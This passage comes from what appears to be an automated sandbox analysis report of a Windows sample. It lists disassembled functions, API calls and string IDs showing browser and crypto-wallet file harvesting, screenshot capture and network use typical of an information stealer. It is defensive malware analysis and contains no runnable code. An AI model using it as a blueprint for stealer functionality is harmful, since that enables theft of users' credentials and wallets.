                                                                                • InternetCloseHandle.WININET(?), ref: 004058D2
                                                                                • InternetCloseHandle.WININET(?), ref: 004058DB
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                • String ID: "$"$"$($------$------$------$------$build_id$mode
                                                                                • API String ID: 2237346945-1447386369
                                                                                • Opcode ID: c89f37200f9922f7106968f5488809e0814500ea6250647198128ec8ff4c3949
                                                                                • Instruction ID: b4e14776caadebfe53afa945c4bf6ce093965098b883e79db6b3ac6117d29439
                                                                                • Opcode Fuzzy Hash: c89f37200f9922f7106968f5488809e0814500ea6250647198128ec8ff4c3949
                                                                                • Instruction Fuzzy Hash: 6D425EB190414DEADB11EBE1C956BEEBBB8AF18308F50017EE505B3582DB781B4CCB65
                                                                                Function 0040C679 Relevance: 44.7, APIs: 19, Strings: 6, Instructions: 924fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1469 40c679-40c72b _EH_prolog call 40f923 call 40fa28 call 40fa9c call 40f9e1 call 40f98e * 2 call 40f923 * 2 call 40fb4d FindFirstFileA 1488 40c772-40c778 1469->1488 1489 40c72d-40c76d call 40f98e * 3 call 401061 call 40f98e 1469->1489 1490 40c77a-40c78e StrCmpCA 1488->1490 1520 40d3d4-40d3f9 call 40f98e * 2 1489->1520 1492 40d374-40d386 FindNextFileA 1490->1492 1493 40c794-40c7a8 StrCmpCA 1490->1493 1492->1490 1495 40d38c-40d3d1 FindClose call 40f98e * 3 call 401061 call 40f98e 1492->1495 1493->1492 1496 40c7ae-40c83a call 40f997 call 40fa28 call 40fa9c * 2 call 40f9e1 call 40f98e * 3 1493->1496 1495->1520 1536 40c840-40c859 call 40fb4d StrCmpCA 1496->1536 1537 40c99f-40ca34 call 40fa9c * 4 call 40f9e1 call 40f98e * 3 1496->1537 1543 40c8ff-40c99a call 40fa9c * 4 call 40f9e1 call 40f98e * 3 1536->1543 1544 40c85f-40c8fa call 40fa9c * 4 call 40f9e1 call 40f98e * 3 1536->1544 1584 40ca3a-40ca5c call 40f98e call 40fb4d StrCmpCA 1537->1584 1543->1584 1544->1584 1595 40ca62-40ca76 StrCmpCA 1584->1595 1596 40cc7b-40cc90 StrCmpCA 1584->1596 1595->1596 1597 40ca7c-40cbf5 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 call 40f923 call 40fa9c * 2 call 40f9e1 call 40f98e * 2 call 40f95a call 40618b 1595->1597 1598 40cc92-40ccf5 call 4010b1 call 40f95a * 3 call 40c27b 1596->1598 1599 40cd05-40cd1a StrCmpCA 1596->1599 1806 40cc44-40cc76 call 40fb4d call 40fb14 call 40fb4d call 40f98e * 2 1597->1806 1807 40cbf7-40cc3f call 40f95a call 4010b1 call 414437 call 40f98e 1597->1807 1655 40ccfa-40cd00 1598->1655 1600 40cd96-40cdb1 call 40f95a call 410cdd 1599->1600 1601 40cd1c-40cd33 call 40fb4d StrCmpCA 1599->1601 1626 40ce37-40ce4c StrCmpCA 1600->1626 1627 40cdb7-40cdba 1600->1627 1613 40d2e3-40d2ea 1601->1613 1614 40cd39-40cd3c 1601->1614 1618 40d364-40d36f call 40fb14 * 2 1613->1618 1619 40d2ec-40d359 call 40f95a * 2 call 40f923 call 4010b1 call 40c679 1613->1619 1614->1613 1621 40cd42-40cd94 call 4010b1 call 40f95a * 2 1614->1621 1618->1492 1687 40d35e 1619->1687 1666 40ce15-40ce27 call 40f95a call 406737 1621->1666 1632 40d0d0-40d0e5 StrCmpCA 1626->1632 1633 40ce52-40cf43 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 CopyFileA 1626->1633 1627->1613 1635 40cdc0-40ce12 call 4010b1 call 40f95a call 40f923 1627->1635 1632->1613 1643 40d0eb-40d1dc call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 CopyFileA 1632->1643 1748 40d027-40d040 call 40fb4d StrCmpCA 1633->1748 1749 40cf49-40d021 call 4010b1 call 40f95a * 3 call 406e2a call 4010b1 call 40f95a * 3 call 407893 1633->1749 1635->1666 1754 40d2c0-40d2d2 call 40fb4d DeleteFileA call 40fb14 1643->1754 1755 40d1e2-40d2ba call 4010b1 call 40f95a * 3 call 4071c6 call 4010b1 call 40f95a * 3 call 4074e2 1643->1755 1655->1613 1688 40ce2c-40ce32 1666->1688 1687->1618 1688->1613 1763 40d0b1-40d0c3 call 40fb4d DeleteFileA call 40fb14 1748->1763 1764 40d042-40d0ab call 4010b1 call 40f95a * 3 call 407ec7 1748->1764 1749->1748 1775 40d2d7 1754->1775 1755->1754 1789 40d0c8-40d0cb 1763->1789 1764->1763 1781 40d2da-40d2de call 40f98e 1775->1781 1781->1613 1789->1781 1806->1596 1807->1806
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040C67E
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00425BD3,00425BD2,00000000,?,00425D1C,?,?,00425BCF,?,?,00000000), ref: 0040C71F
                                                                                • StrCmpCA.SHLWAPI(?,00425D20,?,?,00000000), ref: 0040C786
                                                                                • StrCmpCA.SHLWAPI(?,00425D24,?,?,00000000), ref: 0040C7A0
                                                                                • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425D28,?,?,00425BD6,?,?,00000000), ref: 0040C851
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                • API String ID: 3869166975-1816240570
                                                                                • Opcode ID: 6ef869c5acf4193e10be2cf9d0355ff0e5442593db8ce554f40d3e93bb02fcfc
                                                                                • Instruction ID: 7e6182c7e919ebae31536edbd22d10e843a74c74831f1e41d64d485d49d03601
                                                                                • Opcode Fuzzy Hash: 6ef869c5acf4193e10be2cf9d0355ff0e5442593db8ce554f40d3e93bb02fcfc
                                                                                • Instruction Fuzzy Hash: 3A826070900288EADF25EBA5C955BDDBBB4AF19304F5040BEE449B32C2DB78174DCB66
                                                                                Function 004153F6 Relevance: 44.1, APIs: 21, Strings: 4, Instructions: 316stringfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1847 4153f6-415469 _EH_prolog call 4181c0 wsprintfA FindFirstFileA memset * 2 1850 41581b-415835 call 401061 1847->1850 1851 41546f-415483 StrCmpCA 1847->1851 1853 415489-41549d StrCmpCA 1851->1853 1854 4157fa-41580c FindNextFileA 1851->1854 1853->1854 1857 4154a3-4154df wsprintfA StrCmpCA 1853->1857 1854->1851 1855 415812-415815 FindClose 1854->1855 1855->1850 1858 4154e1-4154f9 wsprintfA 1857->1858 1859 4154fb-41550a wsprintfA 1857->1859 1860 41550d-41553e memset lstrcat 1858->1860 1859->1860 1861 415561-41556b strtok_s 1860->1861 1862 415540-415551 1861->1862 1863 41556d-4155a1 memset lstrcat 1861->1863 1868 415785-41578b 1862->1868 1869 415557-415560 1862->1869 1864 4156e1-4156eb strtok_s 1863->1864 1866 4156f1 1864->1866 1867 4155a6-4155b6 PathMatchSpecA 1864->1867 1866->1868 1870 4156d7-4156e0 1867->1870 1871 4155bc-4156bb call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 3 call 410f12 call 418360 1867->1871 1868->1854 1872 41578d-415799 1868->1872 1869->1861 1870->1864 1915 4156f6-415705 1871->1915 1916 4156bd-4156d2 call 40fb4d call 40f98e 1871->1916 1872->1855 1874 41579b-4157a3 1872->1874 1874->1854 1876 4157a5-4157ef call 4010b1 call 4153f6 1874->1876 1884 4157f4 1876->1884 1884->1854 1918 415836-415841 call 40f98e 1915->1918 1919 41570b-41572e call 40f95a call 40618b 1915->1919 1916->1870 1918->1850 1929 415730-415775 call 40f923 call 4010b1 call 414437 call 40f98e 1919->1929 1930 41577a-415780 call 40f98e 1919->1930 1929->1930 1930->1868
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004153FB
                                                                                • wsprintfA.USER32 ref: 00415421
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                • memset.MSVCRT ref: 0041544F
                                                                                • memset.MSVCRT ref: 0041545D
                                                                                • StrCmpCA.SHLWAPI(?,0042684C), ref: 0041547B
                                                                                • StrCmpCA.SHLWAPI(?,00426850), ref: 00415495
                                                                                • wsprintfA.USER32 ref: 004154B9
                                                                                • StrCmpCA.SHLWAPI(?,0042656E), ref: 004154CA
                                                                                • wsprintfA.USER32 ref: 004154F0
                                                                                • wsprintfA.USER32 ref: 00415504
                                                                                • memset.MSVCRT ref: 00415516
                                                                                • lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                • strtok_s.MSVCRT ref: 00415561
                                                                                • memset.MSVCRT ref: 00415576
                                                                                • lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004155AE
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004156B0
                                                                                • strtok_s.MSVCRT ref: 004156E1
                                                                                • FindNextFileA.KERNELBASE(000000FF,?), ref: 00415804
                                                                                • FindClose.KERNEL32(000000FF), ref: 00415815
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                • API String ID: 264515753-332874205
                                                                                • Opcode ID: 6f8998cb08b0944052efbf8740fd338e57bd105e93cc6d3c4222f09e779521f7
                                                                                • Instruction ID: 697dee4ec641feb1abd42be2dd66715ab0a5b9e69653565ecd0b7dc1d93a1252
                                                                                • Opcode Fuzzy Hash: 6f8998cb08b0944052efbf8740fd338e57bd105e93cc6d3c4222f09e779521f7
                                                                                • Instruction Fuzzy Hash: A4C170B1D0015DEEDF21EBE4DC45FDEBBBDAB08304F50406AF519A2191DB389A48CB65
                                                                                Function 6C7B35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2637 6c7b35a0-6c7b35be 2638 6c7b38e9-6c7b38fb call 6c7eb320 2637->2638 2639 6c7b35c4-6c7b35ed InitializeCriticalSectionAndSpinCount getenv 2637->2639 2641 6c7b38fc-6c7b390c strcmp 2639->2641 2642 6c7b35f3-6c7b35f5 2639->2642 2641->2642 2644 6c7b3912-6c7b3922 strcmp 2641->2644 2645 6c7b35f8-6c7b3614 QueryPerformanceFrequency 2642->2645 2646 6c7b398a-6c7b398c 2644->2646 2647 6c7b3924-6c7b3932 2644->2647 2648 6c7b361a-6c7b361c 2645->2648 2649 6c7b374f-6c7b3756 2645->2649 2646->2645 2652 6c7b3938 2647->2652 2653 6c7b3622-6c7b364a _strnicmp 2647->2653 2648->2653 2654 6c7b393d 2648->2654 2650 6c7b396e-6c7b3982 2649->2650 2651 6c7b375c-6c7b3768 2649->2651 2650->2646 2655 6c7b376a-6c7b37a1 QueryPerformanceCounter EnterCriticalSection 2651->2655 2652->2649 2656 6c7b3650-6c7b365e 2653->2656 2657 6c7b3944-6c7b3957 _strnicmp 2653->2657 2654->2657 2658 6c7b37b3-6c7b37eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2655->2658 2659 6c7b37a3-6c7b37b1 2655->2659 2660 6c7b395d-6c7b395f 2656->2660 2661 6c7b3664-6c7b36a9 GetSystemTimeAdjustment 2656->2661 2657->2656 2657->2660 2664 6c7b37ed-6c7b37fa 2658->2664 2665 6c7b37fc-6c7b3839 LeaveCriticalSection 2658->2665 2659->2658 2662 6c7b36af-6c7b3749 call 6c7ec110 2661->2662 2663 6c7b3964 2661->2663 2662->2649 2663->2650 2664->2665 2667 6c7b383b-6c7b3840 2665->2667 2668 6c7b3846-6c7b38ac call 6c7ec110 2665->2668 2667->2655 2667->2668 2672 6c7b38b2-6c7b38ca 2668->2672 2673 6c7b38dd-6c7b38e3 2672->2673 2674 6c7b38cc-6c7b38db 2672->2674 2673->2638 2674->2672 2674->2673
                                                                                APIs
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(6C83F688,00001000), ref: 6C7B35D5
                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7B35E0
                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 6C7B35FD
                                                                                • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C7B363F
                                                                                • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C7B369F
                                                                                • __aulldiv.LIBCMT ref: 6C7B36E4
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 6C7B3773
                                                                                • EnterCriticalSection.KERNEL32(6C83F688), ref: 6C7B377E
                                                                                • LeaveCriticalSection.KERNEL32(6C83F688), ref: 6C7B37BD
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 6C7B37C4
                                                                                • EnterCriticalSection.KERNEL32(6C83F688), ref: 6C7B37CB
                                                                                • LeaveCriticalSection.KERNEL32(6C83F688), ref: 6C7B3801
                                                                                • __aulldiv.LIBCMT ref: 6C7B3883
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C7B3902
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C7B3918
                                                                                • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C7B394C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                • API String ID: 301339242-3790311718
                                                                                • Opcode ID: e76ffe40396481026ba2b62b417efc83b3153857c5d7952fe682fdac07358577
                                                                                • Instruction ID: e20c8ebf0ee3472fcbadfab92db34699105b0c000252bedaf713f9e121d1e704
                                                                                • Opcode Fuzzy Hash: e76ffe40396481026ba2b62b417efc83b3153857c5d7952fe682fdac07358577
                                                                                • Instruction Fuzzy Hash: 36B191B1B092109BDB28DF69C54461A7BF5AB99708F049D3DE89DD3350EB709C44CBC5
                                                                                Function 004162AF Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227stringfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004162B4
                                                                                • wsprintfA.USER32 ref: 004162D4
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                • StrCmpCA.SHLWAPI(?,00426908), ref: 00416308
                                                                                • StrCmpCA.SHLWAPI(?,0042690C), ref: 00416322
                                                                                • wsprintfA.USER32 ref: 00416346
                                                                                • StrCmpCA.SHLWAPI(?,0042657D), ref: 00416357
                                                                                • wsprintfA.USER32 ref: 00416374
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • wsprintfA.USER32 ref: 00416388
                                                                                • PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                • lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                • lstrcat.KERNEL32(?,00426924), ref: 004163D9
                                                                                • lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                • lstrcat.KERNEL32(?,00426928), ref: 004163FB
                                                                                • lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                • FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                • API String ID: 3254224521-445461498
                                                                                • Opcode ID: c6dd6b3879fbe31c0c2597002abf9d8c351d85b94a33bf6f60126e16f2efa105
                                                                                • Instruction ID: 716d461ee9032d4a9dae4af77dc79a1df6d5d6082356418533081d48ea1eca12
                                                                                • Opcode Fuzzy Hash: c6dd6b3879fbe31c0c2597002abf9d8c351d85b94a33bf6f60126e16f2efa105
                                                                                • Instruction Fuzzy Hash: 34919E71D0025DABDF11EBE4DD4ABDE7BB8AF09304F4040AAF505A3191DB389748CBA5
                                                                                Function 004112FD Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 162windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00411302
                                                                                • memset.MSVCRT ref: 00411328
                                                                                • GetDesktopWindow.USER32 ref: 0041135E
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041136B
                                                                                • GetDC.USER32(00000000), ref: 00411372
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0041137C
                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041138D
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00411398
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004113B4
                                                                                • GlobalFix.KERNEL32(?), ref: 00411412
                                                                                • GlobalSize.KERNEL32(?), ref: 0041141E
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
                                                                                  • Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                  • Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044A4
                                                                                  • Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                • SelectObject.GDI32(00000000,?), ref: 00411498
                                                                                • DeleteObject.GDI32(?), ref: 004114B3
                                                                                • DeleteObject.GDI32(00000000), ref: 004114BA
                                                                                • ReleaseDC.USER32(00000000,?), ref: 004114C4
                                                                                • CloseWindow.USER32(00000000), ref: 004114CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
